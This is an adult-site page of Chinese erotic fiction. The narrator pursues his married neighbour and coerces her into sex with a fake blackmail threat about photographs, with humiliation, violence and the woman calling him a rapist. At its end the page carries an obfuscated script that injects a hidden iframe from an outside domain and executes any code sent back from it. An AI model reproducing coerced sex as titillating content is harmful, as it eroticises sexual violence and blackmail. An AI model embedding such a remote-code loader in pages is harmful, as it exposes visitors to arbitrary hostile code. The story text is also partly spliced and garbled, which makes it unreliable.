字幕網- 每日更新 永久免費


“——籲”,我長喘一口氣,擦擦頭上的汗水,倒在剛剛搬來的還不及放好的沙發上,揉著酸疼的腿和胳膊。經過二個多月的辛苦,新居裝飾工作算是初步完成了。一會兒,“咣咣咣”,傳來敲防盜鐵門的聲音。剛剛來,我的新居還沒裝門鈴。“誰呀?我問。“你對麵的鄰居”。我一聽,連忙應道:“來了”。有道是遠親不如近鄰,鄰居關係還是要搞好的嘛,尤其是如今社會治安不好,盜賊橫行的時候。(別誤會,並不是全盤否定現在的社會,可小偷實在是多且厲害)。我打開門,一個約四十歲的高大男人站在門外,我是小個子,他近一米八的個頭差不多高我一個頭頂。“請進”,我說。“搬來了?我在樓下看到你家在搬東西”。“是,不好還要過一段才住進來”。“裝修得不錯呀”。他抬頭看打量我的房子。“哪裏,隻是一般”。說實話,由於囊中羞澀,裝修的房子除了是木地板,其他都不起眼。而且沒什幺家俱,更別說什幺現代化的大件家電謁如家庭影院之類的了。

“請坐”。我指了指沙發,“還沒弄好,連水都沒一口”。我抽出一根煙,“來一根”?他伸手接過,點了煙,噴出一口煙霧。——是個老煙鬼。我看他的姿勢和吐出來的煙霧,想道。倆人坐在沙發上,聊天起來,交談中,我了解到他姓陳,在部隊工作,是個處長。搬來已經一年多了,就住在我的對麵。不久,我看到對麵房子——就是他的,一個從背影看身材很好的婦人在開鎖。老陳開口叫她,那個女人轉過身來。見他坐在我家,也走了過來。跟他先生一樣,一進門就打量房子的裝修。“是新來的鄰居,姓劉”。老陳介紹道。“這是我太太”,他又對我說。“哦,你好”他的太太對我笑笑。“你好”,我站起身來招呼。這是一個三十多歲的漂亮女人,頗有幾分江珊的姿韻。臉上皮膚光潔白淨,有一種柔柔的光澤。大概是夫妻生活很如意吧。我情不自禁這樣想。——都說性生活滿意的女人臉上皮膚就很好。


“回去吧”,她轉身叫他的丈夫。他的丈夫站起身來。“有空過來玩”。對我說。“好的,改天有空我會的”。我送他們出門。他的夫人大概一米六幾吧,和我差不多高。“真是個漂亮的女人”我望著她的背影心中暗想。

大概過了兩天,我送東西到新居,在樓梯上碰到老陳的太太,我笑笑,對她點點頭。她也對我笑了笑。算是招呼了。說實話,我這人不善言談交際,而且個子不高,其貌不揚,總是有點自卑。在出門時,看到對麵的門開著,就走了過去。我在開著的門上敲了敲,老陳從客廳旁邊的房間裏探出頭來看了看,“是你呀,請進,請進”。我走了進去,在他家的沙發上坐了下來。老陳倒了一杯水給我。聊了幾句,我就站起身,四處參觀他的房子,老陳陪著我轉。然後又坐回去,誇了幾句房子真漂亮的話,聊著一些不著邊際的事,滿心希望能看到陳太太,但她就是不露麵,坐了會兒甚覺無趣也就告辭了。又過了十幾天,我上班時接到老陳的電話,對我說,我們兩家的防盜門都讓人撬壞了,你晚上來一下,我們一起去小區管理處。晚上我先到老陳家,會齊了他一起來到小區物業管理處。老陳的太太也從後麵跟來了。到了物業公司,老陳夫妻先開了口,情緒激動地向一個經理模樣的人反映了情況。沒想到那個經理傲慢地說,你們說的事,我們也沒辦法,我們隻管公共場所的安全。老陳夫妻一時怔在那邊,想不出要說什幺。“可是,你們收的物業管理費是含了保衛費的呀。不是請了小區保安嗎?公共安全是哪些安全?跟小區住戶有什幺關係?要是隻管公共場所的安全,那住戶的安全利益不是得不到保障嗎?那要你們管理什幺?你們負的是什幺責呢?那這個費我們也不用交了”。我說道。“是呀,是呀,你們負的是什幺責呢?那這個費我們也不用交了”,陳太太跟著說。在我們的堅持下,物業公司終於答應第二天派人過去看,按損失賠償我們。出了小區物業管理的大門,老陳夫妻顯得很高興。邀請我上他們家再坐坐。於是我和他們一起上去。到了他們家,由於我剛才在小區物業管理處的表現,他們對我很是客氣。特別是老陳的太太,坐在我旁邊的沙發上,還陷在談判勝利後那種激動和喜悅中,臉色緋旌搖蕩,——真是一個尤物,我想道。我怕老陳和她發現,終是不敢多看,但那一截白白的豐腴大腿幾天裏都在我眼前晃來晃去。過了二十多天,我結婚前三、四日,畢竟是鄰居了。送一張請柬給他們夫妻,打好關係吧。我腦海中晃著陳太太白白的大腿。於是我來到老陳家,恰好老陳不在,我把請柬拿給陳太太,把結婚的事給她說了,並請他們賞光一定去。

陳太太剛剛還笑笑的臉登時落下來,有點不開心的樣子,不太搭理我了。——真是小氣的女人,是怕出禮金吧。我想到。心中也甚是不快。但轉念她如此小氣,想到她白白的大腿,心中反而高興起來。結婚那天,他們夫妻都沒來,隻捎人帶來一個50元的中暗暗好笑。知道了老陳他們愛貪小便宜,我到他們家坐,總是帶些小玩意給他們的兒子,或者走時故意把抽了剩半包的煙掉在他家的茶幾上,或者,老婆不在的時候,在外麵買些弄好了的好菜和酒到老陳家啜幾口。老陳夫妻見我每次去他們都有些便宜沾,對我很熱情。隻要我上門,他們都很高興。於是,關係一天天好起來。他們家有時做了點好吃的,偶爾也會過來叫我。但是平心而論,陳太太雖然愛貪小便宜,卻是個正經的女人,在家的衣著也是整整齊齊,找不出“破綻”讓我一飽眼福。有那幺幾次,穿著略為低腦的無領衫,也隻是露出白白的一片胸脯,連乳溝都看不到。或者是半長的裙子,露到膝上一、兩寸的地方,露著白白的漂亮小腿,卻再沒有露出半截白白的大腿讓我看了。老陳上班很輕鬆,而且單位從未安排他出差,交際也少,除了煙酒,別無嗜好,連流行的國粹——麻將也不打,基本上下班後就在家。陳太太更是一副相夫教子的賢妻樣子。看來我一點機會也沒有。如此一年多下來,我一無所獲,除了知道陳太太名叫楊秀芳,33歲和在一家保險公司上班外,就是在他們家花去幾千元的“呆頭帳”了。我想想花去的冤頭債,很不死心。很快,我的女兒出生了。老婆被嶽母接到鄉下去做月子。隻剩我一個,於是隻要有空,就到老陳家混。又花費了幾百元的“死帳”。其間有一次,陳太太蹶著屁股彎腰在餐桌前擦餐椅,我裝作上廁所,經過她旁邊的時候,手裝作不小心碰到她,在她的屁股上不輕不重地摸了一下,她抬起頭來看我,可我裝作毫不知情的樣子,頭都不回地走過去。可就隻這一摸,已經讓我的心狂跳不止。我在廁所裏想:無論如何我要搞上她。

第二天是周六,下午六時左右,我拎了三瓶長城幹紅要有所作為,於是盡可能出花樣叫老陳喝,自已卻總是舉杯淺嚐輒止,大概喝了二個多小時,酒也喝了兩瓶多了,老陳說話的聲音開始麻了,我的頭也有點暈暈的。這時,陳太太服侍她兒子睡下後,也洗了澡穿了睡衣坐在沙發上看電視,她聽到老陳話都說不清了,走過來說:“差不多了,不要喝了,小洪,留著明天喝吧”。我說:“楊姐,不要緊吧?我和老陳都高興,再說,明天不上班,今天一醉方休”。老陳也說:“不喝了,不喝了,再喝就醉了”。我摘下手腕上的手表,指著一瓶才倒一點的酒說:“你把它喝了,這手表就歸你了”。他們都知道,我的手表是價值千多元的“西鐵城”名表。老陳一把抓起手表說:“此話當真”?我說:“是啊,我幾時講過假話”?老陳指指他老婆,“她喝也算”?“算”!老陳把表放進兜裏,抓起酒瓶仰起脖子,“咕咚咕咚”喝了半瓶。然後重重的把瓶子放在桌上,睜著血紅的眼睛你別照相呀,可不要害我啊”。我把相機放進抽屜裏,把她按倒在床上,“那幺,你不反對我再來一次吧”?我的裸體貼在她細膩的肉體上,小弟弟立馬又弩張劍撥。我驚訝於自己的饑渴和“快速反應”。“不,你先把相機給我”。她說。“不,你先讓我操,操完給你”,我堅決地說。她被我按在床上,掙紮要起來,但被我按在那裏,又如何起得來?終於,她不再反抗,無奈地說,“你真無恥,不過一定要給我啊”。我不再應她,吻著她,一隻手搓揉著她的乳房,一隻手撥弄著她的陰辰。我的舌頭伸進她的嘴裏,攪動著她的舌頭,吮吸著。不知是由於我的精液還尚存有在她陰道裏的緣故,還是她又流了淫水。隻覺得觸手是水,滑溜溜的。她這次躺在床上,既不躲避,也不迎合,隻是任由我輕薄地折騰。我把兩根手指插進她的陰道裏,來回抽插。嘴唇離開她的嘴,慢慢從她的脖子上吻下,經由她的乳房,一直吻到她的小腹。然後用牙齒咬住她的陰毛,輕輕地扯動。當我伏下頭去扒開她的陰道口,仔細審視她裏麵紅紅的嫩肉時,她才夾起大腿,並用手把陰戶遮擋,不讓我觀看。說真的,陳太太的身材和膚色都很好,象完全沒有生過小孩的那種樣子。乳頭雖不象有些處女般粉紅,但並不象有些婦女般是褐色的。小腹平坦,根本沒有生過孩子的妊娠紋的痕跡。陰戶也很漂亮,兩片飽滿的陰辰來著一道小溝,中間露出紅紅的嫩肉。一雙大腿渾圓修長而結實,全身皮膚白晰細膩,皮膚薄得有些地方隱約透出青色的血管。除了散落著幾顆小小的褐色的黑痣,渾身上下幾乎沒一點暇疵。我伸手扒開她的雙腿,撥開她擋在陰戶上的手,想用舌頭去舔她的陰核,她連忙又合起雙腿,並用手推我的頭,說:“別,那兒髒”。我還要用強,她堅決不肯,我隻好作罷。我仍舊用手伸進她的陰道裏撥弄,並和她接吻。過了好久,我抽出手指,說道:“好了,把我的小弟弟捉進去吧。”她說,“不,我不”。我裝作惡狠狠好說:“你不是嗎?那好吧,你別想要膠卷了”。她於是伸手到我的檔部,握住我的陰莖,引到她的洞口,卻用指甲掐了一下我的陰莖說道:“去死吧”。“哎喲,好痛。”我一下子爸她壓倒在床上,象騎馬一氧騎坐在她的肚子上,“看我怎幺蹂躪你!”我一邊說著,一邊把全身的重量都壓到她柔軟扁平的肚皮上。我那時有胖又高,二百多勁的重量把楊姐的小薄腰坐得扁扁的,不時地我還用力顛一顛。楊姐在我身下嗷嗷直叫,淫水夾著尿液從她兩腿間不斷用處。後來,我索性站起來擁右腳踏在它的已經被我壓得很扁平的肚子上,用力地踩。“我,服!”她終於求饒了。“好呀,我就叫它在你的洞洞裏醉死算了”。說著,我把腳從她肚子上拿下來,把雞巴用力一挺,全根插了進去。我邊插邊羞辱她:“我的小弟比你老公的如何?”陳太太不吭聲,我惡聲又問,“不說是嗎”?陳太太說道:“不知道”。“你怎幺會不知道。想要膠卷就老實回答”。陳太太半晌說道:“你的比他的硬”。“誰的大”?“不知道”。我下麵用力一挺,“誰的更大”?“……差不多”。“硬的好還是軟好”?……
“硬的好還是軟的好”?又是狠狠的一插。“硬的好”。“那和你的老公比,更喜歡我插你,是吧”?陳太太雙手環住我的腰,哀求道:“不要說這樣的話,好不好”?“你老公經常插你嗎”?“不要這樣嘛。”“昨天做愛了吧”?“沒,沒有”。“什幺時候做了”?“前三、四天吧”。“有高潮嗎”?“還算可以吧”。“經常做嗎”“不,不是,一般三四天一次”。“會不會想”?……
“想不想”?“有時想”。“想的時候你老公不做怎幺辦”?……
“說呀”。!“別這樣嘛”。“你自慰過嗎”。“小洪,你真討厭,不要問了”。“你不說我不把膠卷給你的啊”。“……唔,有過”。“怎樣搞”?……“怎樣搞”?“……用手啦”。“我插得你爽嗎”?我邊用力插邊問。“唔……哼,還……可以……”,陳太太低聲呢喃。“你的處女身是你的老公破的嗎”?“不是”。陳太太開始在我身下扭動腰肢配合我的動作。“是誰”?“大學同學”。“幾歲開始做的”?“二十一歲”。“做了幾次”?“三次”。“撒謊”。“真的就三次”。“舒服嗎”?“不舒服”。“現在不舒服是嗎”?“不是,現在舒服”。“那就跟你老公做時不舒服,是嗎”?“有時舒服”。“你和你老公做一般有幾種體位”?“三、四種吧”。“都試一下吧”?我說著停了下來。“不要停,不要停,你不要停呀”!陳太太焦急了,並挺起她的腰湊上我的下體,雙手緊緊圈住我的屁股,不讓我的陰莖從她的陰道裏撥出來。“很舒服了吧,是嗎”?“唔,舒服。不要停下來呀”。“那還告我強奸你嗎”?我又開始用力插。“不,不告,一開始就不告”。“喜歡我嗎”?“……不唔……喜歡”。“那喜歡我的小弟弟吧”?我不停地抽插著陰莖“不喜歡”。“好呀,插死你,反正你不喜歡我,不是騷貨”。“以後還讓我插你嗎”?“不”。“不讓我插,是吧”?“不”。“到底讓不讓我插”?啊……嗬,你快點吧,不要停呀”。陳太太雙手緊緊抱住我的腰,把雙腿交叉卷著壓在我的屁股上。就在她的陰道一陣陣抽搐夾緊的同時,我的精液猶如決堤的洪水,噴射而出。全部射在陳太太的陰道裏。——這次,她沒有叫我不要射進去了。“哦——”,陳太太攤開四肢,長長的喘了一口氣,很是愜意的樣子。然後一雙手在我的背上來回輕撫。一會兒後說:“你出汗了”。“我厲害吧?”我拭去額上的汗,問她。她在我背上捶了一下,“討厭”。一翻身把我掀在床上,爬起來伸出一隻手:“給我”。“還要啊”?“什幺啦,是膠卷呀”。哪有什幺膠卷”?我笑著從床上爬起來到梳妝台的抽屜裏拿出相機扔給她。她打開相機的蓋子,發現裏麵空空的,根本沒裝膠卷。說道:“好呀,小王八騙我”。“不騙你,你會讓我操嗎”?“去死吧。說真的,這次讓你占便宜就算了,下次還敢胡來,我可不答應,告訴我家老陳扁死你”。陳太太在床上開始穿衣服。我上床摟住她,撫弄著她的乳房。“你這幺絕情呀”?“把你的狗爪拿開”,陳太太說道。“難道一點不留戀嗎”?“你以為你是誰啊”。“多少算你半個老公了吧”。“半你的大頭鬼,強奸犯”。陳太太拿起內褲,剛要穿上去,忽然又抓起我的內褲,在胯部擦了擦扔在我身上,然後才穿上內褲,穿好睡衣,拂了拂,跳下床,就要出去。我赤著身子跳下去,從正麵抱住她就吻。陳太太讓我碰了一下她的唇就推開我,“別胡來啊”。說著走出了房門,打開我家的防盜門走出去。我探出頭一看,樓梯上下一片漆黑,四鄰早已入睡。陳太太打開她家的門,幽靈般悄沒聲息閃了進去。剛要關門,被尾隨在後依舊赤身裸體的我抱住了腰,我的雙手從她的睡衣下擺處伸進去,手指陷入她的肉裏,緊緊捧住她渾圓的屁股,讓她的下腹部緊緊地貼住我的下體。陳太太的上半身稍稍向後傾倒,“夠了,別這樣,再不放手我要喊了”。我依舊緊緊抱住她溫軟的肉體,“你喊呀”。陳太太用手辧開我抱在她屁股上的手,“真是無賴”。然後一轉身把我朝門外奮力一推,“砰”地一聲關上門。我回到床上,回味著陳太太的肉體。一年多來的宿願得償,輾轉反側,仍是興奮不已。忽然,我的背部壓到一個硬硬的東西,我伸手摸到眼前一看,是個發卡。應該是陳太太掉下的,我想道,放在鼻子下聞了聞,發卡上似乎還帶著陳太太的發香。那一晚,想著陳太太的肉體,好不容易才在淩晨時分才入睡。




上一篇:Sena Nagakura永倉せな_[58P] 下一篇:美妻讓給別人日完作者不詳
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};